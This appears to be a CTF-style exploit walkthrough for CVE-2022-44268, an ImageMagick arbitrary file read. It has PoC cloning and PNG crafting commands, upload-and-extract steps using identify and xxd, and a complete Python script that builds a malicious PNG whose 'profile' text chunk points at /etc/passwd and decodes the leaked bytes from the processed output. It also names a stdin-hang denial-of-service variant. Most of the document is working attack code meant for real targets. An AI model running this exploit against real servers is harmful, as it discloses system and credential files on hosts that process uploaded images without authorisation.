CVE-2022-44268 affects ImageMagick 7.1.0-49 and allows arbitrary file read through a crafted PNG image. The chain below leverages two closely related bugs, both triggered by a PNG text chunk whose keyword is "profile":
- DoS via the filename "-": if the profile value is a single dash, ImageMagick treats it as a filename meaning standard input, so the converting process blocks forever waiting for stdin (tracked separately as CVE-2022-44267)
- LFI via profile metadata: any other value is opened as a path on the processing host, and the file contents are attached to the image as a raw profile and written into the output image
- Target: ImageMagick 7.1.0-49 processing uploaded images (convert/resize)
- Attack Vector: Malicious PNG with an embedded "profile" text chunk
- Goal: Extract sensitive files (e.g., /etc/passwd, /var/db/pilgrimage)
# Clone the LFI PoC tool
git clone https://github.com/Sybil-Scan/imagemagick-lfi-poc
cd imagemagick-lfi-poc
# Install dependencies (if needed)
pip3 install pypng
# Create PNG with Profile pointing to target file
python3 generate.py -f /etc/passwd -o exploit.png
The script embeds a tEXt chunk "profile: /etc/passwd" in the image metadata. When the vulnerable ImageMagick decodes this image (for example to resize it), it reads /etc/passwd and carries the contents into the output image as a raw profile. Simply storing the upload discloses nothing; the target must actually process the file with ImageMagick.
# Upload the malicious PNG to the target system
# Wait for ImageMagick to process it (via cron job, web upload, etc.)
# Download the processed image (the converted/resized output, not the original upload)
# Dump its metadata with verbose output; the leaked file appears as hex rows under "Raw profile type"
identify -verbose processed.png > img.txt
# Keep only the hex rows (the line just above them is the byte count) and convert them back to bytes
grep -E '^[0-9a-f]+$' img.txt | xxd -r -p
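The following is an added example, not code from the Sybil-Scan PoC or from ImageMagick. It builds the same kind of malicious PNG without pypng (standard library only) and decodes the "Raw profile type" text that a processed image carries, which is what the identify/xxd steps above do by hand. The "processed" image it decodes is constructed locally to mimic the raw-profile layout ImageMagick writes (newline, profile type, 8-wide byte count, rows of 36 hex bytes); it is a simulation, not real ImageMagick output, and the passwd line in it is sample data.

```python
"""CVE-2022-44268: craft the PNG and decode a leaked raw profile (stdlib only)."""
import binascii
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
IHDR_1X1_RGB = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
IDAT_1X1 = zlib.compress(b"\x00\x00\x00\x00")  # filter byte + one black pixel


def png_chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one chunk: length, type, body, CRC32 over type+body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_lfi_png(target_path: str) -> bytes:
    """Valid 1x1 PNG with a tEXt chunk 'profile' = target_path.

    A vulnerable ImageMagick opens the value as a file; '-' means stdin
    and hangs the process instead (the DoS variant).
    """
    text = b"profile\x00" + target_path.encode("latin-1")
    return (PNG_SIG + png_chunk(b"IHDR", IHDR_1X1_RGB) + png_chunk(b"tEXt", text)
            + png_chunk(b"IDAT", IDAT_1X1) + png_chunk(b"IEND", b""))


def iter_chunks(png: bytes):
    """Yield (type, body) for every chunk, checking signature and CRCs."""
    if png[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos = 8
    while pos + 12 <= len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        body = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, body
        pos += 12 + length


def text_chunks(png: bytes):
    """Yield (keyword, text) from tEXt and zTXt chunks (zTXt text is zlib-compressed)."""
    for ctype, body in iter_chunks(png):
        if ctype == b"tEXt":
            key, _, txt = body.partition(b"\x00")
        elif ctype == b"zTXt":
            key, _, rest = body.partition(b"\x00")
            txt = zlib.decompress(rest[1:])  # rest[0] is the compression method byte
        else:
            continue
        yield key.decode("latin-1"), txt


def decode_raw_profile(text: bytes) -> bytes:
    """Turn the '\\n<type>\\n<length>\\n<hex rows>' layout back into bytes."""
    lines = [ln.strip() for ln in text.split(b"\n")]
    for i, ln in enumerate(lines):
        if ln.isdigit():  # first pure-integer line is the byte count; the rest is hex
            raw = binascii.unhexlify(b"".join(lines[i + 1:]))
            if len(raw) != int(ln):
                raise ValueError("profile length mismatch")
            return raw
    raise ValueError("no raw profile body found")


def extract_leaked_files(png: bytes) -> dict:
    """Map each 'Raw profile type ...' keyword in a processed image to the leaked bytes."""
    return {key: decode_raw_profile(txt) for key, txt in text_chunks(png)
            if key.startswith("Raw profile type")}


def simulate_processed_png(leaked: bytes, profile_type: str = "") -> bytes:
    """Constructed stand-in for ImageMagick's output image (simulation, not real output)."""
    hexed = binascii.hexlify(leaked)
    rows = [hexed[i:i + 72] for i in range(0, len(hexed), 72)]  # 36 bytes per row
    body = (b"\n" + profile_type.encode() + b"\n" + b"%8d" % len(leaked)
            + b"\n" + b"\n".join(rows) + b"\n")
    key = ("Raw profile type " + profile_type).encode()
    ztxt = png_chunk(b"zTXt", key + b"\x00\x00" + zlib.compress(body))
    return (PNG_SIG + png_chunk(b"IHDR", IHDR_1X1_RGB) + ztxt
            + png_chunk(b"IDAT", IDAT_1X1) + png_chunk(b"IEND", b""))


if __name__ == "__main__":
    with open("exploit.png", "wb") as fh:
        fh.write(build_lfi_png("/etc/passwd"))
    sample = b"root:x:0:0:root:/root:/bin/bash\n"  # constructed sample of leaked content
    for key, data in extract_leaked_files(simulate_processed_png(sample)).items():
        print(repr(key), data.decode())
```

Run it to write exploit.png next to the script; point extract_leaked_files at the image you download back from the target instead of the simulated one. Decoding from the chunk directly rather than from identify -verbose output avoids picking up unrelated lines that happen to look like hex.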